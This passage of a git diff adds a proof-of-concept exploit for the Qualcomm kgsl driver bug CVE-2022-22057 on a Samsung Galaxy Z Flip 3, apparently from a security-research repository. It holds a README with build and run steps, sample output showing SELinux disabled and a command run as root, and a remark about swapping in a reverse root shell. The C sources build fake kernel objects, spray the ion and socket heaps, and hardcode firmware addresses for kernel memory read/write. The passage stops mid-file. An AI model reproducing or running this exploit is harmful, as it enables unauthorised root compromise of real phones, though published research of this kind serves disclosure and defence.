diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md new file mode 100644 index 0000000..2fc658c --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md @@ -0,0 +1,87 @@ +## Exploit for Qualcomm CVE-2022-22057 + +The write up can be found [here](https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/). This is a bug in the Qualcomm kgsl driver that I reported in November 2021. The bug can be used to gain arbitrary kernel memory read and write from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Samsung Galaxy Z Flip 3 (European version SM-F711B) with firmware version F711BXXS2BUL6, Baseband F711BXXU2BUL4 and Kernel version 5.4.86-qgki-23063627-abF711BXXS2BUL6 (EUX region). The offsets in the exploit refer to that version of the firmware. Apart from the usual offsets in the kernel image, various addresses of the ion memory pools in `ion_utils.c` are also firmware specific. For reference, I used the following command to compile with clang in ndk-21: + +``` +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -O2 timeline_wait.c sendmsg_spray.c signalfd_spray.c cpu_utils.c ion_utils.c fake_obj_util.c work_queue_utils.c -o timeline +``` + +The exploit is reasonably reliable (~70% on tested device), although it does need to wait a few minutes after start up before running, as there are way too many broken/failed binder calls during the first few minutes of start up. 
(Not entirely sure whether it is a Qualcomm or Samsung problem) + +To test, cross compile the file and then execute with `adb`: + +``` +adb push timeline /data/local/tmp +adb shell +b2q:/ $ /data/local/tmp/timeline +``` + +If successful, it will disable SELinux and run the `id` command as root and write the results in the `/data/local/tmp/id.txt` file: + +``` +b2q:/ $ /data/local/tmp/timeline +heap_id_mask 40 +ion region 0x75a0ccf000 +region start addr: ffffff8071800000 +fence kernel addr: ffffff8071fe0040 192 +created fake slab at ffffff8071840100 +[+] reallocation data initialized! +[ ] initializing reallocation threads, please wait... +[+] 40 reallocation threads ready! +timeline_wait start +readpipe start +destroy start +readpipe +Caught signal: 10 + wait complete -1 +readpipe finished +destroy finished +cb_list ffffffc02d943bf8 temp ffffffc02d943c48 +mask 52424242 60 +cpu_id 0 +interval number 1 +mask 7f8e7bfeff 7 +thread number 0 7 20014 +thread batch number 0 +new mask 7f8e7bfeff ffffff8071840100 +region_offset 40100 +sprayed 1024 ion buffer +start searching for buffer +Found 7 ion regions +heap_ops ffffffc012e17180, kernel base: a00b8000 +set enforcing to permissive +[+] successfully overwritten selinux_enforcing +wq_ptr_addr: ffffffc012dc2518 +wq_addr: ffffff81f4cf1200 +pwq_addr ffffff81e24ea100 +pool_addr ffffff805ff7c000 +worklist ffffff805ff7c020 ffffff805ff7c020 +queue work +max_active 256 nr_active 0 +queuing work, waiting to aquire spin lock +work_queued +work processed +complete 0 +ret 0 +nr_active 0 +worklist ffffff805ff7c020 +work next ffffff8071842c08 +[+] successfully run command and added id.txt in /data/local/tmp +finished queue work +freeing ion dma fd +finished freeing ion dma fd +finished spraying +finished +``` +There is a long pause after `wait complete -1` is printed, which should be less than a minute, this is normal. 
It can sometimes also take a while to queue the work (after `queuing work, waiting to aquire spin lock` is printed, can be a couple of minutes, just need to be patient, although that is not common). The exploit normally completes in a couple of minutes. + +The file `/data/local/tmp/id.txt` should confirm that the command was run as root: + +``` +b2q:/ $ cat /data/local/tmp/id.txt +uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0 +``` + +A different command can be run by changing the variable `cmd` in `setup_sub_info` in `work_queue_utils.c`. (For example, to pop a reverse root shell). diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h new file mode 100644 index 0000000..0843796 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h @@ -0,0 +1,38 @@ +#ifndef ADDR_UTILS +#define ADDR_UTILS + +#define PHYS_TO_VIRT_OFF 0x8080000000ul + +#define VMEMMAP 0xfffffffefde00000ul + +#define KERNEL_PBASE 0xa0080000 + +#define KERNEL_VBASE 0xffffffc010080000ul + +//_text - kernel physical base +#define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE) + +static inline uint64_t page_align(uint64_t x) { + return (x >> 12) << 12; +} + +static inline uint64_t phys_to_virt(uint64_t x) { + return (uint64_t)(x) - PHYS_TO_VIRT_OFF; +} + +static inline uint64_t virt_to_phys_lm(uint64_t x) { + if (x & (1ul << 38)) err(1, "address is not in low mem range.\n"); + return x + PHYS_TO_VIRT_OFF; +} + +static inline uint64_t virt_to_phys(uint64_t x) { + if (x & (1ul << 38)) return x - (KERNEL_VBASE - KERNEL_PBASE); + return x + PHYS_TO_VIRT_OFF; +} + +static inline uint64_t phys_to_page(uint64_t phys_addr) { + //VMEMMAP interpreted as page pointer, so pfn needs to multiply by sizeof(struct page) + return (phys_addr >> 12) * 64 + VMEMMAP; +} + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c 
b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c new file mode 100644 index 0000000..38b4fc0 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c @@ -0,0 +1,45 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include "cpu_utils.h" + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +int check_cpu_affinity() { + if (migrate_to_cpu(4) == -1) return 4; + if (migrate_to_cpu(5) == -1) return 5; + return -1; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h new file mode 100644 index 0000000..85f53b3 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h @@ -0,0 +1,7 @@ +#ifndef CPU_UTILS +#define CPU_UTILS + +int migrate_to_cpu(int i); + +int check_cpu_affinity(); +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c new file mode 100644 index 0000000..fe9e115 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c @@ -0,0 +1,120 @@ +#include "fake_obj_util.h" +#include "addr_utils.h" + +static uint64_t vaddr_offset = 0; + +static inline uint64_t get_vaddr(struct list_head* ptr) { + return (uint64_t)ptr + vaddr_offset; +} + +static void init_list_head(struct list_head *list) +{ + list->next = get_vaddr(list); + 
list->prev = get_vaddr(list); +} + +static void list_add(struct list_head *new, struct list_head *prev, + struct list_head * start) +{ + start->prev = get_vaddr(new); + new->next = get_vaddr(start); + new->prev = get_vaddr(prev); + prev->next = get_vaddr(new); +} + +static uint64_t add_zero_filled_area(void* region, size_t offset) { + memset(region + offset, 0, ZERO_FILL_SZ); + return ZERO_FILL_SZ + offset; +} + +static struct list_head* get_list(struct kgsl_timeline_fence* fence) { + return &fence->node; +} + +static void init_fence(struct kgsl_timeline_fence* fence, uint64_t zero_fill_addr, int check) { + struct dma_fence* base = &fence->base; + base->flags = 0; + base->refcount = 0; + if (check) { + base->cb_list.next = 0x41414141; + base->cb_list.prev = 0x42424242; + + } else { + init_list_head(&base->cb_list); + } + base->ops = zero_fill_addr; +} + +static uint64_t create_fake_fences(void* region, uint64_t offset, uint64_t chain_size, uint64_t zero_fill_addr) { + struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)(region + offset); + struct kgsl_timeline_fence* prev = start; + struct list_head* start_list = get_list(start); + struct list_head* prev_list = start_list; + init_list_head(start_list); + init_fence(start, zero_fill_addr, 0); + offset += 128; + for (uint64_t i = 1; i < chain_size; i++) { + struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)(region + offset); + struct list_head* curr_list = get_list(curr); + init_list_head(curr_list); + if (i == chain_size - 1) { + init_fence(curr, zero_fill_addr, 0); + } else { + init_fence(curr, zero_fill_addr, 0); + } + list_add(curr_list, prev_list, start_list); + prev = curr; + prev_list = curr_list; + offset += 128; + } + return offset; +} + +uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr) { + if (sizeof(struct kgsl_timeline_fence) > 128) err(1, "kgsl_timeline_fence too big\n"); + if (chain_size < 2) err(1, "chain size should be 
greater than 1.\n"); + uint64_t fake_size = chain_size * 128 + ZERO_FILL_SZ; + if (fake_size > region_size) err(1, "chain of fake objects does not fit into region.\n"); + uint64_t offset = (region_size - fake_size)/2; + vaddr_offset = region_vaddr - (uint64_t)region; + uint64_t zero_fill_addr = region_vaddr + offset; + offset = add_zero_filled_area(region, offset); + uint64_t out = offset; + offset = create_fake_fences(region, offset, chain_size, zero_fill_addr); + return out; +} + +uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t fence_kstart) { + struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)fence_start; + struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)fence_start; + struct dma_fence* base = &curr->base; + base->flags = 0; + struct list_head* cb_list = &base->cb_list; + if (cb_list->prev > (fence_kstart + chain_size * 128)) { + struct list_head* node = get_list(curr); + node->next = cb_list->prev + STACK_OFFSET; + base->refcount = 0; + base->flags = 1; + return cb_list->prev; + } + return 0; +} + +void create_fake_sgtable(uint8_t* table_region, uint64_t table_vaddr, uint64_t phys_addr, size_t len) { + struct sg_table* table = (struct sg_table*)table_region; + table->nents = 1; + table->orig_nents = 1; + table->sgl = (struct scatterlist*)(table_vaddr + 128); + struct scatterlist* sg = (struct scatterlist*)(table_region + 128); + uint64_t page_link = phys_to_page(phys_addr); + sg->page_link = page_link |= 0x2ul; + sg->length = len; + sg->offset = 0; +} + +void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size) { + create_fake_sgtable(table_region, table_vaddr, (phys_addr >> 12) << 12, size); + buffer->sg_table = (struct sg_table*)table_vaddr; + buffer->size = size; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h new file mode 100644 index 
0000000..bff6d15 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h @@ -0,0 +1,92 @@ +#ifndef FAKE_OBJ_UTIL +#define FAKE_OBJ_UTIL + +#include +#include +#include +#include +#include +#include +#include +#include + +#define ZERO_FILL_SZ 128 + +#define STACK_OFFSET 0x50 + +//offset of node in kgsl_timeline_fence +#define NODE_OFF 0x48 + +struct list_head { + uint64_t next, prev; +}; + +typedef struct { + int counter; +} atomic_t; + +typedef struct refcount_struct { + atomic_t refs; +} refcount_t; + +struct kref { + refcount_t refcount; +}; + +struct dma_fence { + void *lock; + uint64_t ops; + union { + struct list_head cb_list; + int64_t timestamp; + }; + uint64_t context; + uint64_t seqno; + unsigned long flags; + uint32_t refcount; + int error; +}; + +struct kgsl_timeline_fence { + struct dma_fence base; + void *timeline; + struct list_head node; +}; + +struct scatterlist { + unsigned long page_link; + unsigned int offset; + unsigned int length; + uint64_t dma_address; + unsigned int dma_length; +}; + +struct sg_table { + struct scatterlist *sgl; /* the list */ + unsigned int nents; /* number of mapped entries */ + unsigned int orig_nents; /* original size of list */ +}; + +struct ion_buffer { + struct list_head list; + void *heap; + unsigned long flags; + unsigned long private_flags; + size_t size; + void *priv_virt; + uint8_t lock[32]; + int kmap_cnt; + void *vaddr; + struct sg_table *sg_table; + struct list_head attachments; +}; + +uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr); + +uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t region_vaddr); + +void fake_ion_heap(void* region); + +void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c 
new file mode 100644 index 0000000..f4173d9 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c @@ -0,0 +1,94 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "ion_utils.h" + +uint64_t ion_heap_phys_addr(uint32_t id) { + //Specific to Z flip 3 + switch (id) { + case ION_AUDIO_ML_HEAP_ID: //audio_cma_region + return 0xe8000000; + case ION_SECURE_DISPLAY_HEAP_ID://secure_display_region + return 0xf2800000; + case ION_QSECOM_TA_HEAP_ID://qseecom_ta_region + return 0xe2000000; + case ION_QSECOM_HEAP_ID://qseecom_region + return 0xe6400000; + case ION_USER_CONTIG_HEAP_ID://user_contig_region + return 0xf1800000; + case ION_SPSS_HEAP_ID://sp_region + return 0xecc00000; + case ION_ADSP_HEAP_ID://sdsp_region + return 0xedc00000; + case ION_SECURE_CARVEOUT_HEAP_ID://ion_secure_carveout + return 0x80c00000; + default: + err(1, "heap does not have physical address\n"); + } +} + +uint64_t ion_heap_size(uint32_t id) { + //Specific to Z flip 3 + switch (id) { + case ION_AUDIO_ML_HEAP_ID: //audio_cma_region + return 28 * 1024 * 1024; + case ION_SECURE_DISPLAY_HEAP_ID://secure_display_region + return 212 * 1024 * 1024; + case ION_QSECOM_TA_HEAP_ID://qseecom_ta_region + return 32 * 1024 * 1024; + case ION_QSECOM_HEAP_ID://qseecom_region + return 28 * 1024 * 1024; + case ION_USER_CONTIG_HEAP_ID://user_contig_region + return 16 * 1024 * 1024; + case ION_SPSS_HEAP_ID://sp_region + return 16 * 1024 * 1024; + case ION_ADSP_HEAP_ID://sdsp_region + return 8 * 1024 * 1024; + case ION_SECURE_CARVEOUT_HEAP_ID://ion_secure_carveout + return 0x600000; + default: + err(1, "heap does not have physical address\n"); + } +} + +void* spray_ion_heap(uint32_t id, size_t size) { + int fd = open("/dev/ion", O_RDONLY); + if (fd == -1) err(1, "cannot open ion\n"); + void* region = map_ion_region(fd, id, size); + printf("ion region %p\n", region); + if (region == NULL) err(1, "failed to map ion\n"); + return 
region; +} + +int ion_allocate(int ion_fd, uint32_t id, size_t len) { + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = len; + ion_alloc_data.heap_id_mask = id; + int ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data); + if (ret < 0) err(1, "Failed to allocate ion buffer\n"); + return ion_alloc_data.fd; +} + +void* map_ion_region(int ion_fd, uint32_t id, size_t len) { + void* ion_region = NULL; + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = len; + ion_alloc_data.heap_id_mask = id; + printf("heap_id_mask %x\n", ion_alloc_data.heap_id_mask); + int ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data); + if (ret == -ENOMEM) return NULL; + if (ret < 0) err(1, "Failed to allocate ion buffer\n"); + ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_alloc_data.fd, 0); + if (ion_region == MAP_FAILED) { + err(1, "map failed"); + } + return ion_region; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h new file mode 100644 index 0000000..9f3652a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h @@ -0,0 +1,117 @@ +#ifndef ION_UTILS +#define ION_UTILS +#include + +enum ion_heap_type { + ION_HEAP_TYPE_SYSTEM, + ION_HEAP_TYPE_SYSTEM_CONTIG, + ION_HEAP_TYPE_CARVEOUT, + ION_HEAP_TYPE_CHUNK, + ION_HEAP_TYPE_DMA, + ION_HEAP_TYPE_CUSTOM, /* + * must be last so device specific heaps always + * are at the end of this enum + */ + ION_NUM_HEAPS = 16, +}; + +#define ION_HEAP_SYSTEM_MASK ((1 << ION_HEAP_TYPE_SYSTEM)) +#define ION_HEAP_SYSTEM_CONTIG_MASK ((1 << ION_HEAP_TYPE_SYSTEM_CONTIG)) +#define ION_HEAP_CARVEOUT_MASK ((1 << ION_HEAP_TYPE_CARVEOUT)) +#define ION_HEAP_TYPE_DMA_MASK ((1 << ION_HEAP_TYPE_DMA)) + +#define ION_NUM_HEAP_IDS (sizeof(unsigned int) * 8) +#define ION_FLAG_CACHED 1 +#define ION_FLAG_CACHED_NEEDS_SYNC 2 +struct ion_allocation_data { + size_t len; + unsigned int heap_id_mask; + 
unsigned int flags; + uint32_t fd; + uint32_t unused; +}; + +struct ion_custom_data { + unsigned int cmd; + unsigned long arg; +}; + +#define ION_IOC_MAGIC 'I' + +#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \ + struct ion_allocation_data) + +#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data) + +#define ION_IOC_MAP _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data) + +#define ION_IOC_SHARE _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data) + +#define ION_IOC_IMPORT _IOWR(ION_IOC_MAGIC, 5, struct ion_fd_data) + +#define ION_IOC_SYNC _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data) + +#define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data) + +#define ION_BIT(nr) (1UL << (nr)) + +#define ION_HEAP(bit) ION_BIT(bit) + +#define ION_QSECOM_TA_HEAP_ID ION_BIT(1) +#define ION_CAMERA_HEAP_ID ION_BIT(30) +#define ION_DISPLAY_HEAP_ID ION_BIT(3) +#define ION_ADSP_HEAP_ID ION_BIT(4) +#define ION_AUDIO_ML_HEAP_ID ION_BIT(5) +#define ION_USER_CONTIG_HEAP_ID ION_BIT(6) +#define ION_QSECOM_HEAP_ID ION_BIT(7) +#define ION_AUDIO_HEAP_ID ION_BIT(8) +#define ION_CP_MM_HEAP_ID ION_BIT(9) +#define ION_SECURE_HEAP_ID ION_BIT(10) +#define ION_SECURE_DISPLAY_HEAP_ID ION_BIT(11) +#define ION_SPSS_HEAP_ID ION_BIT(14) +#define ION_SECURE_CARVEOUT_HEAP_ID ION_BIT(15) +#define ION_TUI_CARVEOUT_HEAP_ID ION_BIT(16) +#define ION_AUDIO_CARVEOUT_HEAP_ID ION_BIT(17) +#define ION_SYSTEM_HEAP_ID ION_BIT(25) +#define ION_HEAP_ID_RESERVED ION_BIT(31) + +#define ION_ADSP_HEAP_NAME "adsp" +#define ION_SYSTEM_HEAP_NAME "system" +#define ION_MM_HEAP_NAME "mm" +#define ION_SPSS_HEAP_NAME "spss" +#define ION_CAMERA_HEAP_NAME "camera_heap" +#define ION_SECURE_CARVEOUT_HEAP_NAME "secure_carveout" +#define ION_USER_CONTIG_HEAP_NAME "user_contig" +#define ION_QSECOM_HEAP_NAME "qsecom" +#define ION_QSECOM_TA_HEAP_NAME "qsecom_ta" +#define ION_SECURE_HEAP_NAME "secure_heap" +#define ION_SECURE_DISPLAY_HEAP_NAME "secure_display" +#define ION_AUDIO_HEAP_NAME "audio" +#define ION_TUI_CARVEOUT_HEAP_NAME 
"tui_carveout" +#define ION_DISPLAY_HEAP_NAME "display" +#define ION_AUDIO_ML_HEAP_NAME "audio_ml" + +#define ION_HEAP_FLAG_DEFER_FREE (1 << 0) + +//Device/firmware specific +#define ION_HEAP_OPS_OBJ_OFF 0x30 + +#define ION_HEAP_FREELIST_OFF 0x120 + +#define ION_HEAP_FLAGS_OFF 0xc0 + +#define ION_HEAP_WAITQUEUE_OFF 0x140 + +#define ION_HEAP_OPS_OFF 0x2d5f180 + +uint64_t ion_heap_phys_addr(uint32_t id); + +void* map_ion_region(int ion_fd, uint32_t id, size_t len); + +uint64_t ion_heap_size(uint32_t id); + +void* spray_ion_heap(uint32_t id, size_t size); + +int ion_allocate(int ion_fd, uint32_t id, size_t len); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h new file mode 100644 index 0000000..cc4555a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h @@ -0,0 +1,209 @@ +#ifndef KGSL_IOCTL +#define KGSL_IOCTL + +#define VM_MAYWRITE 0x00000020 + +/* ioctls */ +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_GPUOBJ_IMPORT \ + _IOWR(KGSL_IOC_TYPE, 0x48, struct kgsl_gpuobj_import) + +#define ION_IOC_MAGIC 'I' + +#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \ + struct ion_allocation_data) + +#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data) + +#define ION_IOC_MAP _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data) + +#define ION_IOC_SHARE _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data) + +#define ION_IOC_IMPORT _IOWR(ION_IOC_MAGIC, 5, struct ion_fd_data) + +#define ION_IOC_SYNC _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data) + +#define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data) + +#define ION_BIT(nr) (1UL << (nr)) + +#define ION_HEAP(bit) ION_BIT(bit) + +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define KGSL_MEMFLAGS_SECURE 0x00000008ULL + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION 
= 0x00000003, + /* + * ION type is retained for backwards compatibility but Ion buffers are + * dma-bufs so try to use that naming if we can + */ + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_gpuobj_import { + uint64_t __user priv; + uint64_t priv_len; + uint64_t flags; + unsigned int type; + unsigned int id; +}; + +struct kgsl_gpuobj_import_dma_buf { + int fd; +}; + +struct kgsl_gpuobj_import_useraddr { + uint64_t virtaddr; +}; + +struct kgsl_gpuobj_free { + uint64_t flags; + uint64_t __user priv; + unsigned int id; + unsigned int type; + unsigned int len; +}; + +#define KGSL_GPUOBJ_FREE_ON_EVENT 1 + +#define KGSL_GPU_EVENT_TIMESTAMP 1 +#define KGSL_GPU_EVENT_FENCE 2 + +struct kgsl_gpu_event_timestamp { + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_gpu_event_fence { + int fd; +}; + +#define IOCTL_KGSL_GPUOBJ_FREE \ + _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free) + +struct dma_buf_sync { + __u64 flags; +}; + +#define DMA_BUF_SYNC_READ (1 << 0) +#define DMA_BUF_SYNC_WRITE (2 << 0) +#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE) +#define DMA_BUF_SYNC_START (0 << 2) +#define DMA_BUF_SYNC_END (1 << 2) +#define DMA_BUF_SYNC_VALID_FLAGS_MASK \ + (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END) + +#define DMA_BUF_BASE 'b' +#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync) + +#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL + +struct kgsl_timeline_create { + __u64 seqno; + __u32 id; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create) + +/** + * struct kgsl_timeline_val - A container to store a timeline/sequence number + * pair. + * @seqno: Sequence number to signal/query + * @timeline: The timeline identifier to signal/query + * + * A container to store a timeline/seqno pair used by the query and signal + * ioctls. 
+ */ +struct kgsl_timeline_val { + __u64 seqno; + __u32 timeline; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define KGSL_TIMELINE_WAIT_ALL 1 +#define KGSL_TIMELINE_WAIT_ANY 2 + +/** + * struct kgsl_timeline_wait - Argument for IOCTL_KGSL_TIMELINE_WAIT + * @tv_sec: Number of seconds to wait for the signal + * @tv_nsec: Number of nanoseconds to wait for the signal + * @timelines: Address of an array of &struct kgsl_timeline_val entries + * @count: Number of entries in @timeline + * @timelines_size: Size of each entry in @timelines + * @flags: One of KGSL_TIMELINE_WAIT_ALL or KGSL_TIMELINE_WAIT_ANY + * + * Wait for the timelines listed in @timelines to be signaled. If @flags is + * equal to KGSL_TIMELINE_WAIT_ALL then wait for all timelines or if + * KGSL_TIMELINE_WAIT_ANY is specified then wait for any of the timelines to + * signal. @tv_sec and @tv_nsec indicates the number of seconds and nanoseconds + * that the process should be blocked waiting for the signal. + */ +struct kgsl_timeline_wait { + __s64 tv_sec; + __s64 tv_nsec; + __u64 timelines; + __u32 count; + __u32 timelines_size; + __u32 flags; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_WAIT \ + _IOW(KGSL_IOC_TYPE, 0x59, struct kgsl_timeline_wait) + +#define IOCTL_KGSL_TIMELINE_QUERY \ + _IOWR(KGSL_IOC_TYPE, 0x5A, struct kgsl_timeline_val) + +/** + * struct kgsl_timeline_signal - argument for IOCTL_KGSL_TIMELINE_SIGNAL + * @timelines: Address of an array of &struct kgsl_timeline_val entries + * @count: Number of entries in @timelines + * @timelines_size: Size of each entry in @timelines + * + * Signal an array of timelines of type @struct kgsl_timeline_val. 
+ */ +struct kgsl_timeline_signal { + __u64 timelines; + __u32 count; + __u32 timelines_size; +}; + +#define IOCTL_KGSL_TIMELINE_SIGNAL \ + _IOW(KGSL_IOC_TYPE, 0x5B, struct kgsl_timeline_signal) + +/** + * struct kgsl_timeline_fence_get - argument for IOCTL_KGSL_TIMELINE_FENCE_GET + * @seqno: Sequence number for the fence + * @timeline: Timeline to create the fence on + * @handle: Contains the fence fd for a successful operation [out] + * + * Create a sync file descriptor for the seqnum on the timeline and return it in + * @handle. Can be polled and queried just like any other sync file descriptor + */ +struct kgsl_timeline_fence_get { + __u64 seqno; + __u32 timeline; + int handle; +}; + +#define IOCTL_KGSL_TIMELINE_FENCE_GET \ + _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get) +/** + * IOCTL_KGSL_TIMELINE_DESTROY takes a u32 identifier for the timeline to + * destroy + */ +#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32) + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c new file mode 100644 index 0000000..7c2e407 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c @@ -0,0 +1,187 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "sendmsg_spray.h" +#include "cpu_utils.h" + +//Taken from: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html + +int init_realloc_data(char* realloc_data, size_t obj_size, int level, int type) { + if (level == 1) err(1, "Level cannot be 1\n"); + struct cmsghdr *first; + + // necessary to pass checks in __scm_send() + first = (struct cmsghdr*) realloc_data; + first->cmsg_len = obj_size; + first->cmsg_level = level; + first->cmsg_type = type; + return 0; +} + +int init_unix_sockets(struct realloc_thread_arg * rta) { + struct timeval tv; + static int sock_counter = 0; + + if (((rta->recv_fd = 
socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) || + ((rta->send_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0)) + { + perror("[-] socket"); + goto fail; + } + + memset(&rta->addr, 0, sizeof(rta->addr)); + rta->addr.sun_family = AF_UNIX; + sprintf(rta->addr.sun_path + 1, "sock_%x_%d", gettid(), ++sock_counter); + if (bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))) + { + perror("[-] bind"); + goto fail; + } + + if (connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))) + { + perror("[-] connect"); + goto fail; + } + + memset(&tv, 0, sizeof(tv)); + if (setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { + err(1, "setsockopt"); + } + + return 0; +fail: + printf("[-] failed to initialize UNIX sockets!\n"); + return -1; +} + +static volatile size_t g_nb_realloc_thread_ready = 0; +static volatile size_t g_realloc_now[MAX_SENDMSG_BATCH] = {0}; + +static void* realloc_thread(void *arg) +{ + struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg; + struct msghdr mhdr; + char buf[200] = {0}; + + // initialize msghdr + struct iovec iov = { + .iov_base = buf, + .iov_len = sizeof(buf), + }; + memset(&mhdr, 0, sizeof(mhdr)); + mhdr.msg_iov = &iov; + 